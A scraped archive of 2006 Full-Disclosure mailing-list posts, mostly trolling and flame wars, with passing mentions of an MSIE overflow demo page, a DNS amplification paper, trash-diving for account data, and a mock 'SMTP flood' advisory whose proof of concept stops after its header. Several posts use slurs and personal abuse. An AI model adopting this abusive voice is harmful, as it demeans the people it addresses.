[Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

[Konstantine]

On 3/16/06, Michal Zalewski <[EMAIL PROTECTED]> wrote:
> For non-believers, there's a short but fiery demonstration page available
> at http://lcamtuf.coredump.cx/iedie.html (yes, it will probably crash your
> browser).

Confirmed with 6.0.2900.2180.xpsp_sp2-gdr.050301-1519 on XPSP2
K.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo recommends you write down accountinformation

[n3td3v]

After I write data, I raely have incentive to read the data before its submitted via the www communications network.
 
I prefer freestyle, you know, and that way it gives scope for bored office workers to poke holes in the n3td3v agenda.
 
I mean, I don't want folks to feel left out of the n3td3v phenomena.
 
Lets keep the big corporations happy with the window of opportunity for criticism open for the time being. 
I encourage folks to be critical, it adheres to the freedom of speech I believe in, that the FD admin mr cartwight is currently ignoring, by trying to gag all n3td3v correspondence to the outside world.
 
And to think UK peoples stick together against the AMERICAN invasion. Lets forget that, especially when John Cartwight is concerned.
 
At least i'm running the biggest security operation on Google Groups, allowing me to push out information to the international community at timely releases.
 
John Cartwight eat your heart out.
 
REGARDS,
 
n3td3v
 
On 3/18/06, Sean Crawford <[EMAIL PROTECTED]> wrote:


LOL..
Do you mean refuse?.or do you think yahoo keeps all its garbage in some kind of citadel?.
; )

Sean.


- Original Message - 
From:  netdev
 
 
However, if you want to get into the criminal element of how paperwork is obtained. Its often caught at refuge sites at dot coms. In the same was fraud is carried out to obtain credit card info via receipts.
___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

[Valdis . Kletnieks]

On Sat, 18 Mar 2006 02:31:37 +0100, poo said:

> i also know how to convert a cow into bacon !!!

Obligatory full disclosure:

Cows go MOOO. Pigs go OINK. Bacon comes from the one that goes OINK.

Unless you have a really clever DNA sequencer hack to do the conversion,
in which case full disclosure obligates you to tell us the gene offsets to 
use


pgpmdEpZN2pSV.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo recommends you write down accountinformation

[Sean Crawford]

LOL..
Do you mean refuse?.or do you 
think yahoo keeps all its garbage in some kind of 
citadel?.
; )
Sean.

  - Original Message - 
  From:  
  netdev
   
   
  However, if you want to get into the criminal element of how paperwork is 
  obtained. Its often caught at refuge sites at dot coms. In the 
  same was fraud is carried out to obtain credit card info via 
receipts.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MSN Passport Cert improperly issued

[Nick FitzGerald]

Babak Pasdar wrote:

> It seems that MSN's cert for private login to the passport site is
> issued for the wrong domain.  

So?

Given what that cert means even if it is "right" (i.e. diddly squat -- 
basically someone paid some money to a company that your browser 
recognizes as a CA), it tells you nothing really important, so why 
sweat it being "wrong"?


Regards,

Nick FitzGerald

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo recommends you write down account information

[n3td3v]

Like I marked up earlier in this thread, its not about how an account would be compromised. It was PHUN pointed at peoples I REGULARY post to off list on a politically incorrect stance of having different wordings between Yahoo teams. 

 
The highlight of the thread is that once again i've proved Yahoo does not co-ordinate, as I have ranted about on the n3td3v blog before I killed off the trend of blogging.
 
Politically, a security team hates for the outside world to know they aren't co-ordinated. The same goes for the number and skill level of incident response staff they have on stand-by at certain times of year.

 
However, if you want to get into the criminal element of how paperwork is obtained. Its often caught at refuge sites at dot coms. In the same was fraud is carried out to obtain credit card info via receipts.
 
And you can bet Yahoo Inc have no CCTV at their refuge areas, in the same way they don't take the threat of folks following folks home to break into homes and steal hardware, in the same way they don't check for folks standing outside Sunnyvale for peoples looking for insecure wireless connections, and in the same way they don't take the threat from rogue employees feeding out information from within to thrid party groups who are offering them money.

 
Many folks in the industry seperate CRIMINALS, from cyber threats (ie: hackers), although both are the same. You need to be tripping if you think someone behind a computer wouldn't raid a corporate refuge area, to later go back to a computer to compromise an account.

 
In the same way its trippy to think theres not yahoo employees harvesting paper work information for third parties.
 
Its time for the industry to wake upto the fact that "cross criminality" exists in computer crimes, and stop thinking say, phishing is equal to criminals, while exploit code is equal to hackers.
 
On 3/18/06, MR BABS <[EMAIL PROTECTED]> wrote:

I did read them, and this again enforces my point, you guys are just trolls.Nobody takes you guys seriously.Provide me with a legitimate situation, in which a 'bad guy' has access to physically printed out documents, and the mailbox of the user , where he could not simply either install a keylogger, sniff the passwords off the network, or get them from the system. 
The truth is, yahoo uses this as a way to prevent annoyance. I'd suspect if they DIDN'T ask for this information n3td3v would be on here claiming that it was a DoS vulnerability or some comparable bullshit.Anyways, great troll, but this is an old meme, so lets keep moving the FDRUIN forward, shall we? 


On 3/17/06, n3td3v <[EMAIL PROTECTED]> wrote:
 


Didn't you read this http://groups.google.com/group/n3td3v/browse_thread/thread/c18d3cb3267fc4a0/0e1a4176301c25c8#0e1a4176301c25c8 
 before you carried out your own sector of trolling? 
http://groups.google.com/group/n3td3v/browse_thread/thread/c18d3cb3267fc4a0/0e1a4176301c25c8#0e1a4176301c25c8 
Please keep politically correct on FD, otherwise, the CERT folks might get worried :P

 
On 3/18/06, MR BABS <[EMAIL PROTECTED]> wrote: 


WOW great troll n3td3v you are truly the greatest trolling organization on the earth! I bet you and bantown are cooking up some schemes right now!
On 3/16/06, [EMAIL PROTECTED] <
 [EMAIL PROTECTED]> wrote: 
Do you blow everything out of perportion like this?  How old mustyou be to have this attitude. 
On Thu, 16 Mar 2006 15:52:06 -0800 n3td3v group<[EMAIL PROTECTED] > wrote:>You're Yahoo's top security advisor, who I talk to every day off 
>the record, but you say PEOPLE LIE ABOUT INFORMATION THEY PUT ON>ONLINE FORMS?>>  I think you're missing the point. The account information YAHOO >ask users to print out is the ACTUAL information on the users 
>ACCOUNT table.>>  SURE, folks can type COMPLETE crap in their registeration for>signing upto a Yahoo account, but whatever information is >submitted to the Yahoo account, it is the TRUE information that 
>would give access to that account.>>  SO, no matter the trend of users giving BOGUS information to>sign up for an account, the only people who would print out >information is people who would have submitted TRUE information. 
>Otherwise, why would they print out info they knew was bogus?>>  MARK, you're Yahoo's top security advisor, and I respect you off >the record, but coming on here trying to defend Yahoo's sec pros 
>for getting it totally wrong in their CONTRADICTION between sites>is totally wrong.>>  Yahoo said the wording  "DONT WRITE DOWN YOUR PASSWORD" but on >the registeration proceedure it says "YAHOO RECOMMEND YOU WRITE 
>DOWN YOUR ACCOUNT INFORMATION">>  YOU AS YAHOO SECURITY ADVISOR NEED TO ADMIT "YAHOO" AS A>CORPORATION GOT IT WRONG. >>  I speak to you every day off list, but going off on your own 
>crusade won't make the rest of the Yahoo security team like you>better.>>  SEE YOU OFF LIST SEIDEN.>>  Sorry to everyone else, this is part of an off list argument >that Yahoo's top advisor can't get a grip of. 
>>  (How di

Re: [Full-disclosure] Yahoo recommends you write down account information

[MR BABS]

I did read them, and this again enforces my point, you guys are just trolls.Nobody takes you guys seriously.Provide me with a legitimate situation, in which a 'bad guy' has access to physically printed out documents, and the mailbox of the user , where he could not simply either install a keylogger, sniff the passwords off the network, or get them from the system.
The truth is, yahoo uses this as a way to prevent annoyance. I'd suspect if they DIDN'T ask for this information n3td3v would be on here claiming that it was a DoS vulnerability or some comparable bullshit.Anyways, great troll, but this is an old meme, so lets keep moving the FDRUIN forward, shall we?
On 3/17/06, n3td3v <[EMAIL PROTECTED]> wrote:
Didn't you read this 
http://groups.google.com/group/n3td3v/browse_thread/thread/c18d3cb3267fc4a0/0e1a4176301c25c8#0e1a4176301c25c8
 before you carried out your own sector of trolling? 
http://groups.google.com/group/n3td3v/browse_thread/thread/c18d3cb3267fc4a0/0e1a4176301c25c8#0e1a4176301c25c8

Please keep politically correct on FD, otherwise, the CERT folks might get worried :P
 
On 3/18/06, MR BABS <[EMAIL PROTECTED]> wrote:


WOW great troll n3td3v you are truly the greatest trolling organization on the earth! I bet you and bantown are cooking up some schemes right now!
On 3/16/06, [EMAIL PROTECTED] <

[EMAIL PROTECTED]> wrote: 
Do you blow everything out of perportion like this?  How old mustyou be to have this attitude.
On Thu, 16 Mar 2006 15:52:06 -0800 n3td3v group<[EMAIL PROTECTED] > wrote:>You're Yahoo's top security advisor, who I talk to every day off
>the record, but you say PEOPLE LIE ABOUT INFORMATION THEY PUT ON>ONLINE FORMS?>>  I think you're missing the point. The account information YAHOO >ask users to print out is the ACTUAL information on the users
>ACCOUNT table.>>  SURE, folks can type COMPLETE crap in their registeration for>signing upto a Yahoo account, but whatever information is >submitted to the Yahoo account, it is the TRUE information that
>would give access to that account.>>  SO, no matter the trend of users giving BOGUS information to>sign up for an account, the only people who would print out >information is people who would have submitted TRUE information.
>Otherwise, why would they print out info they knew was bogus?>>  MARK, you're Yahoo's top security advisor, and I respect you off >the record, but coming on here trying to defend Yahoo's sec pros
>for getting it totally wrong in their CONTRADICTION between sites>is totally wrong.>>  Yahoo said the wording  "DONT WRITE DOWN YOUR PASSWORD" but on >the registeration proceedure it says "YAHOO RECOMMEND YOU WRITE
>DOWN YOUR ACCOUNT INFORMATION">>  YOU AS YAHOO SECURITY ADVISOR NEED TO ADMIT "YAHOO" AS A>CORPORATION GOT IT WRONG. >>  I speak to you every day off list, but going off on your own
>crusade won't make the rest of the Yahoo security team like you>better.>>  SEE YOU OFF LIST SEIDEN.>>  Sorry to everyone else, this is part of an off list argument >that Yahoo's top advisor can't get a grip of.
>>  (How did you become Yahoo's top security advisor? :P)>  SEE YOU OFF LIST>  Bye>  

 [EMAIL PROTECTED] wrote:>a certain number of people lie about their birthdate and>zipcode, or>they forget just what they lied about, or move from place to>place and forgot where they lived when they registered, 
>and they don't have a working alternate email address.>>>-> Yahoo! Mail> Use Photomail to share photos without annoying attachments.

Concerned about your privacy? Instantly send FREE secure email, no account requiredhttp://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485

___Full-Disclosure - We believe in it.Charter: 

http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

 ___Full-Disclosure - We believe in it.Charter: 

http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/



___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo recommends you write down account information

[n3td3v]

Didn't you read this http://groups.google.com/group/n3td3v/browse_thread/thread/c18d3cb3267fc4a0/0e1a4176301c25c8#0e1a4176301c25c8
 before you carried out your own sector of trolling? http://groups.google.com/group/n3td3v/browse_thread/thread/c18d3cb3267fc4a0/0e1a4176301c25c8#0e1a4176301c25c8

Please keep politically correct on FD, otherwise, the CERT folks might get worried :P
 
On 3/18/06, MR BABS <[EMAIL PROTECTED]> wrote:

WOW great troll n3td3v you are truly the greatest trolling organization on the earth! I bet you and bantown are cooking up some schemes right now!
On 3/16/06, [EMAIL PROTECTED] <
[EMAIL PROTECTED]> wrote: 
Do you blow everything out of perportion like this?  How old mustyou be to have this attitude.
On Thu, 16 Mar 2006 15:52:06 -0800 n3td3v group<[EMAIL PROTECTED] > wrote:>You're Yahoo's top security advisor, who I talk to every day off
>the record, but you say PEOPLE LIE ABOUT INFORMATION THEY PUT ON>ONLINE FORMS?>>  I think you're missing the point. The account information YAHOO >ask users to print out is the ACTUAL information on the users
>ACCOUNT table.>>  SURE, folks can type COMPLETE crap in their registeration for>signing upto a Yahoo account, but whatever information is >submitted to the Yahoo account, it is the TRUE information that
>would give access to that account.>>  SO, no matter the trend of users giving BOGUS information to>sign up for an account, the only people who would print out >information is people who would have submitted TRUE information.
>Otherwise, why would they print out info they knew was bogus?>>  MARK, you're Yahoo's top security advisor, and I respect you off >the record, but coming on here trying to defend Yahoo's sec pros
>for getting it totally wrong in their CONTRADICTION between sites>is totally wrong.>>  Yahoo said the wording  "DONT WRITE DOWN YOUR PASSWORD" but on >the registeration proceedure it says "YAHOO RECOMMEND YOU WRITE
>DOWN YOUR ACCOUNT INFORMATION">>  YOU AS YAHOO SECURITY ADVISOR NEED TO ADMIT "YAHOO" AS A>CORPORATION GOT IT WRONG. >>  I speak to you every day off list, but going off on your own
>crusade won't make the rest of the Yahoo security team like you>better.>>  SEE YOU OFF LIST SEIDEN.>>  Sorry to everyone else, this is part of an off list argument >that Yahoo's top advisor can't get a grip of.
>>  (How did you become Yahoo's top security advisor? :P)>  SEE YOU OFF LIST>  Bye>  
 [EMAIL PROTECTED] wrote:>a certain number of people lie about their birthdate and>zipcode, or>they forget just what they lied about, or move from place to>place and forgot where they lived when they registered, 
>and they don't have a working alternate email address.>>>-> Yahoo! Mail> Use Photomail to share photos without annoying attachments.
Concerned about your privacy? Instantly send FREE secure email, no account requiredhttp://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485
___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
 ___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Yahoo recommends you write down account information

[MR BABS]

WOW great troll n3td3v you are truly the greatest trolling organization on the earth! I bet you and bantown are cooking up some schemes right now!On 3/16/06, 
[EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
Do you blow everything out of perportion like this?  How old mustyou be to have this attitude.On Thu, 16 Mar 2006 15:52:06 -0800 n3td3v group<[EMAIL PROTECTED]
> wrote:>You're Yahoo's top security advisor, who I talk to every day off>the record, but you say PEOPLE LIE ABOUT INFORMATION THEY PUT ON>ONLINE FORMS?>>  I think you're missing the point. The account information YAHOO
>ask users to print out is the ACTUAL information on the users>ACCOUNT table.>>  SURE, folks can type COMPLETE crap in their registeration for>signing upto a Yahoo account, but whatever information is
>submitted to the Yahoo account, it is the TRUE information that>would give access to that account.>>  SO, no matter the trend of users giving BOGUS information to>sign up for an account, the only people who would print out
>information is people who would have submitted TRUE information.>Otherwise, why would they print out info they knew was bogus?>>  MARK, you're Yahoo's top security advisor, and I respect you off
>the record, but coming on here trying to defend Yahoo's sec pros>for getting it totally wrong in their CONTRADICTION between sites>is totally wrong.>>  Yahoo said the wording  "DONT WRITE DOWN YOUR PASSWORD" but on
>the registeration proceedure it says "YAHOO RECOMMEND YOU WRITE>DOWN YOUR ACCOUNT INFORMATION">>  YOU AS YAHOO SECURITY ADVISOR NEED TO ADMIT "YAHOO" AS A>CORPORATION GOT IT WRONG.
>>  I speak to you every day off list, but going off on your own>crusade won't make the rest of the Yahoo security team like you>better.>>  SEE YOU OFF LIST SEIDEN.>>  Sorry to everyone else, this is part of an off list argument
>that Yahoo's top advisor can't get a grip of.>>  (How did you become Yahoo's top security advisor? :P)>  SEE YOU OFF LIST>  Bye>  
[EMAIL PROTECTED] wrote:>a certain number of people lie about their birthdate and>zipcode, or>they forget just what they lied about, or move from place to>place and forgot where they lived when they registered,
>and they don't have a working alternate email address.>>>-> Yahoo! Mail> Use Photomail to share photos without annoying attachments.
Concerned about your privacy? Instantly send FREE secure email, no account requiredhttp://www.hushmail.com/send?l=480Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MSN Passport Cert improperly issued

[Tim]

> Get better connection little cry girl.

Jackass: Get a clue. 

We aren't talking about my connection.  We're talking about the
bandwidth of the free service that allows you to make a fool of yourself
in front of thousands of people.

tim

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Fwd: Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit

[n3td3v]

-- Forwarded message --From: n3td3v <[EMAIL PROTECTED]>Date: Mar 18, 2006 2:41 AMSubject: Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit
To: full-disclosure@lists.netsys.com

Greets,
 
n3td3v group has no association with #bantown and ask them to retract references to n3td3v group in future source code mark ups.
 
I also ask them to retract from using "3 3" which is obviously secret code to suggest n3td3v group is involved in your malicious activites.
 
Mucha love,
 
n3td3v
 
American kids nowadays. I blame hormone induced beef which Mc Donalds and Burger King use for their Happy Meals.
 
3 3 <[EMAIL PROTECTED]> wrote: # greetz 2 # weev, hep, hugparty, bob, tosh, choob,
# krade, the church of jesus christ of latter-day saints,# n3td3v, Gadi Evron, Dave Aitel, Carolyn Meinel, CERT, # u4ea, the jizztapo, CDEJ for being gay french, all of bantown and ED.  
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fw: You have been unsubscribed from the Full-Disclosure mailing list

[poo]

goodbye and good riddance :)))
On 3/18/06, Jason Coombs <[EMAIL PROTECTED]> wrote:
[Full-Disclosure] is dead.Long live full disclosure.-Original Message-From: 
[EMAIL PROTECTED]Date: Sat, 18 Mar 2006 00:01:39To:[EMAIL PROTECTED]Subject: You have been unsubscribed from the Full-Disclosure mailing list
For quality control purposes please send mail to [EMAIL PROTECTED] andtell us why you're unsubscribing. Thanks!.___
Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - 
http://secunia.com/-- smile tomorrow will be worse 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is FD Moderated now?

[poo]

moderated??? are you asking if this is faghat centra now??
On 3/18/06, MR BABS <[EMAIL PROTECTED]> wrote:

Hey GuysIs full disclosure moderated list now? ___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
-- smile tomorrow will be worse 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Fwd: Your message to Full-Disclosure awaits moderator approval

[n3td3v group]

  -- Forwarded message --From: [EMAIL PROTECTED]<[EMAIL PROTECTED]>Date: Mar 18, 2006 12:47 AMSubject: Your message to Full-Disclosure awaits moderator approval  Your mail to 'Full-Disclosure' with the subjectRe: greetzIs being held until the list moderator can review it for approval.The reason it is being held:Post to moderated list
		 Yahoo! Mail 
Use Photomail to share photos without annoying attachments.___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

[poo]

of course you have!!!
i also know how to convert a cow into bacon !!! 
On 3/17/06, Michal Zalewski <[EMAIL PROTECTED]> wrote:
On Thu, 16 Mar 2006, Michal Zalewski wrote:> This might not come as a surprise, but there appears to be a *very*
> interesting and apparently very much exploitable overflow in Microsoft> Internet Explorer (mshtml.dll).I'd like to make a self-serving statement in response to dozens of peoplewho pointed out that this month, iDefense pays $10,000 per any
vulnerability that would result in a Microsoft security advisory rated"critical"...YES, I HAVE THIS KNOWLEDGE.I simply do not subscribe to that way of making money. It might be thatI'm insane or dumb, but it feels good.
Regards,/mzhttp://lcamtuf.coredump.cx/___Full-Disclosure - We believe in it.Charter: 
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/-- smile tomorrow will be worse 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Fw: You have been unsubscribed from the Full-Disclosure mailing list

[Jason Coombs]

[Full-Disclosure] is dead.

Long live full disclosure.

-Original Message-
From: [EMAIL PROTECTED]
Date: Sat, 18 Mar 2006 00:01:39 
To:[EMAIL PROTECTED]
Subject: You have been unsubscribed from the Full-Disclosure mailing list

For quality control purposes please send mail to [EMAIL PROTECTED] and
tell us why you're unsubscribing. Thanks!

.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Fwd: greetz

[n3td3v group]

-- Forwarded message --From: n3td3v <[EMAIL PROTECTED]>Date: Mar 18, 2006 12:47 AMSubject: Re: greetzTo: full-disclosure@lists.grok.org.ukGet back to IRC kiddie hacker...n3td3v group are elite experts in the security industry.While our name might attract the kiddie community, we're far fromhaving relations with people such as yourself.We suggest you stop spamming Full-Disclosure and get back to AOL Chat,where you guys originated from.Otherwise, i'll inform your ISP, and your ISP will inform your mom anddad what you're upto on their Walmart Desktop PC, and then your momand dad will spank you, for being so childish.Disconnect you from the internet and send you to Bratcamp.On 3/17/06, 3 3 <[EMAIL PROTECTED]>wrote:> LOL THX N3TD3V>> YOU FUCKING FAIL: YOU WHITEHAT PILE OF SHIT.> YOUR ADVISORY TROLLS GENERATE SO MUCH HATE. IT'S GREAT!>>
 AND THESE WHITEHAT FAGGOTS CAN'T TELL: LOLOLOL>> U-R NUMBAR WAN TROLL.
		Yahoo! Mail
Bring photos to life! New PhotoMail  makes sharing a breeze. 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] is FD Moderated now?

[MR BABS]

Hey GuysIs full disclosure moderated list now?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] DNS Amplification Attacks

[Gadi Evron]

In this paper we address in detail how the recent DNS DDoS attacks work.
How they abuse name servers, EDNS, the recursive feature and UDP packet 
spoofing, as well as how the amplification effect works.


Our study is based on packet captures (we provide with samples) and logs 
from attacks on different networks reported to have a volume of 2.8Gbps. 
One of these networks indicated some attacks have reached as high as 
10Gbps and used as many as 140,000 exploited name servers.


In the conclusions we also discuss some remediation suggestions.

Given recent events, we have been encouraged to make this text available 
at this time.


URL: http://www.isotf.org/news/DNS-Amplification-Attacks.pdf

Please note that this version of this paper is prior to submission for 
publication and that the final version may see significant revisions.


Thanks,

Randy Vaughn and Gadi Evron.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Furry FD Porn Copyright J.W. Bernal

[bigdaddyzeroday]

ASL?

OMGWTFBBQ

On Fri, 17 Mar 2006 14:43:00 -0800 Steve Friedl <[EMAIL PROTECTED]> 
wrote:
>On Fri, Mar 17, 2006 at 05:39:33PM -0500, 3 3 wrote:
>> =]
>
>Somebody forgot to include "NSFW"
>
>I guess FD is now officially just an AOL chat room, right?
>
>-- 
>Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 
>544-6561
>www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | 
>[EMAIL PROTECTED]
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/



Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MSN Passport Cert improperly issued

[bigdaddyzeroday]

Get better connection little cry girl.

On Fri, 17 Mar 2006 07:56:38 -0800 Tim  wrote:
>Do you have any idea how many people are subscribed to this list?  

>When
>you attach even a slightly large file to your emails, you amplify 
>that
>traffic several hundred(thousand?)-fold.  Many people on the list 
>may
>not give a shit about your post. (Although this one is moderately
>interesting.)  It is just a big waste of bandwidth for this free
>service.
>
>Please be polite and post your jpg to your website, and provide a 
>link.
>Email was never intended for file transfer in the first place, and 

>isn't
>particularly efficient at it.
>
>thanks,
>tim
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/



Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: More JW Bernal Furry Sex 0day PORN! (3 3)

[Vympel]

Why u don't send this pictures to a porn site
Here is a security mailing list, lamma.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Filtering Latest Spam Run (radio.toad.com)

[bigdaddyzeroday]

No he not. He just dick sucker who like think he cool.

On Thu, 16 Mar 2006 12:11:07 -0800 Damian Gerow 
<[EMAIL PROTECTED]> wrote:
>Thus spake Jason Coombs ([EMAIL PROTECTED]) [16/03/06 04:33]:
>: uh huh, and now we know the spam kiddie responsible. I pay by 
>the KB to 
>: receive all your junk, so you can expect a lawsuit in the near 
>future.
>
>You pay by the KB and subscribe to FD?
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/



Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] WhiteHat Scum is Jerking OFF

[3 3]

WhiteHat Scum is Jerking OFF
<>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] CopyRight Furry Porn!

[bigdaddyzeroday]

Why not attach malicious image file.  More laughs if that work.

On Fri, 17 Mar 2006 15:04:08 -0800 3 3 <[EMAIL PROTECTED]> wrote:
>ruin



Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CopyRight Furry Porn!

[3 3]

fap
<>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] WhiteHat Scum is Jerking OFF

[3 3]

WhiteHat Scum is Jerking OFF
<>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CopyRight Furry Porn!

[3 3]

Ruin=]
<>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CopyRight Furry Porn!

[3 3]

Ruin!
<>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Furry FD Porn Copyright J.W. Bernal

[Steve Friedl]

On Fri, Mar 17, 2006 at 05:39:33PM -0500, 3 3 wrote:
> =]

Somebody forgot to include "NSFW"

I guess FD is now officially just an AOL chat room, right?

-- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit

[3 3]

Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit==1. Description==It is possible to flood Full Disclosure Mailing List via the SMTP protocol, causing possible buffer overflow, probable disk write failure, and definate DoS.
==2. Solution==The clear solution, as per Bantown security, is to moderate all mailing lists for an until the ESMTP MTA developers can reach a better solution.==3. History
==Mar 13, 2006 [+] Vendor Notification.Mar 13, 2006 [+] Public Disclosure.==4. PoC==#!/usr/bin/perl# # SMTP FLOOD PoC# by Jmax, Bantown Security, INC.
